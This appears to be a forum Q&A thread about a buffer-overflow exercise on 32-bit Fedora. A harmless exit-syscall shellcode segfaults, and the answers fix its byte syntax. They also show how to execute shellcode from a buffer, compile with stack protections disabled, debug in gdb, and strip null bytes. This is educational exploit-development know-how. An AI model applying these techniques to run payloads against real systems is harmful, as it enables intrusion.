[user1@fedo BOF]$ gcc -o ExitShellCode ExitShellCode.c
[user1@fedo BOF]$ ./ExitShellCode
Segmentation fault (core dumped)
This is the objdump of the assembled shellcode:
[user1@fedo BOF]$ objdump -d exitShellcodeaAss
exitShellcodeaAss: file format elf32-i386
Disassembly of section .text:
08048054 <_start>:
8048054: bb 14 00 00 00 mov $0x14,%ebx
8048059: b8 01 00 00 00 mov $0x1,%eax
804805e: cd 80 int $0x80
System I'm using
fedora Linux 3.1.2-1.fc16.i686
ASLR is disabled.
Debugging with GDB.
gcc version 4.6.2
Maybe it is too late to answer this question, but there might be a subtle syntax error. It seems that the shellcode is malformed. I mean:
char shellcode[]= "/0xbb/0x14/0x00/0x00/0x00"
"/0xb8/0x01/0x00/0x00/0x00"
"/0xcd/0x80";
is not the same as:
char shellcode[]= "\xbb\x14\x00\x00\x00"
"\xb8\x01\x00\x00\x00"
"\xcd\x80";
This fix alone may not solve the problem, though. Have you tried disabling kernel protection mechanisms such as the NX bit, stack randomization, etc.?
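The difference between the "/0xbb" and "\xbb" spellings is easy to check with sizeof. In this sketch the array names `as_text` and `as_bytes` are made up for the example, and only the first two bytes of the shellcode are used: the first array holds ordinary printable characters, the second holds raw byte values.

```c
#include <assert.h>
#include <stddef.h>

/* "/0xbb" is five ordinary characters: '/', '0', 'x', 'b', 'b'. */
static const char as_text[]  = "/0xbb/0x14";
/* "\xbb" is a hex escape: a single byte with value 0xBB. */
static const char as_bytes[] = "\xbb\x14";

/* Checked at compile time (C11): both sizes include the terminating NUL. */
static_assert(sizeof(as_text) == 11, "ten characters plus NUL");
static_assert(sizeof(as_bytes) == 3, "two bytes plus NUL");

/* Number of payload bytes in each array, excluding the terminating NUL. */
size_t text_len(void)  { return sizeof(as_text)  - 1; }
size_t bytes_len(void) { return sizeof(as_bytes) - 1; }

/* First byte of each array, as an unsigned value. */
unsigned first_text_byte(void)  { return (unsigned char)as_text[0]; }
unsigned first_bytes_byte(void) { return (unsigned char)as_bytes[0]; }
```

So the CPU would see 0x2F ('/') as the first opcode byte of the slash-spelled version instead of 0xBB, which is the opcode of mov $imm32,%ebx.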
Based on two other questions, namely How to determine return address on stack? and C: return address of function (mac), I'm confident that you are not overwriting the correct address. This is caused by your assumption that the return address can be located in the way you did it. But as the answer to the first question (1) states, this need not be the case.
Therefore:
Check if the address is really correct
Find a way for determining the correct return address, if you do not want to use the builtin GCC feature
You can also execute shellcode like in this scenario, by casting the buffer to a function like
(*(int(*)()) shellcode)();
If you want the shellcode to be executed on the stack, you must compile with an executable stack (-z execstack, which turns off NX protection for the stack). -fno-stack-protector additionally disables stack canaries.
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
E.g.
#include <stdio.h>
#include <string.h>
const char code[] ="\xbb\x14\x00\x00\x00"
"\xb8\x01\x00\x00\x00"
"\xcd\x80";
int main()
{
printf("Length: %zu bytes\n", strlen(code)); /* strlen returns size_t, so use %zu */
(*(void(*)()) code)();
return 0;
}
If you want to debug it with gdb:
[manu@debian /tmp]$ gdb ./shellcode
GNU gdb (Debian 7.7.1+dfsg-5) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
...
Reading symbols from ./shellcode...(no debugging symbols found)...done.
(gdb) b *&code
Breakpoint 1 at 0x4005c4
(gdb) r
Starting program: /tmp/shellcode
Length: 2 bytes
Breakpoint 1, 0x00000000004005c4 in code ()
(gdb) disassemble
Dump of assembler code for function code:
=> 0x00000000004005c4 <+0>: mov $0x14,%ebx
0x00000000004005c9 <+5>: mov $0x1,%eax
0x00000000004005ce <+10>: int $0x80
0x00000000004005d0 <+12>: add %cl,0x6e(%rbp,%riz,2)
End of assembler dump.
In this proof-of-concept example the null bytes do not matter. But when you are developing shellcode you should keep them in mind and remove such bad characters.
Shellcode cannot have zero bytes in it (string functions such as strcpy stop copying at the first one). Remove the null characters.
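The "Length: 2 bytes" line in the gdb session above comes from the same effect: strlen stops at the first zero byte, while sizeof counts the whole array. A minimal sketch using the exit shellcode bytes from the question; the function names are hypothetical helpers written for this example.

```c
#include <assert.h>
#include <string.h>

/* The exit shellcode bytes from the question, zero bytes included. */
static const char code[] = "\xbb\x14\x00\x00\x00"
                           "\xb8\x01\x00\x00\x00"
                           "\xcd\x80";

/* Bytes a string function such as strlen or strcpy would see. */
size_t visible_to_string_functions(void) { return strlen(code); }

/* Real payload size: sizeof counts every byte, minus the implicit NUL. */
size_t actual_size(void) { return sizeof(code) - 1; }

/* Hypothetical helper: count zero bytes in the first len bytes of buf. */
size_t count_zero_bytes(const char *buf, size_t len)
{
    assert(buf != NULL);
    size_t zeros = 0;
    for (size_t i = 0; i < len; i++)
        if (buf[i] == '\0')
            zeros++;
    return zeros;
}
```

Here strlen reports 2 while the payload is really 12 bytes long, so a strcpy-based overflow would deliver only the first two bytes. Running count_zero_bytes over a candidate payload is a quick way to check whether it still contains such bytes.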
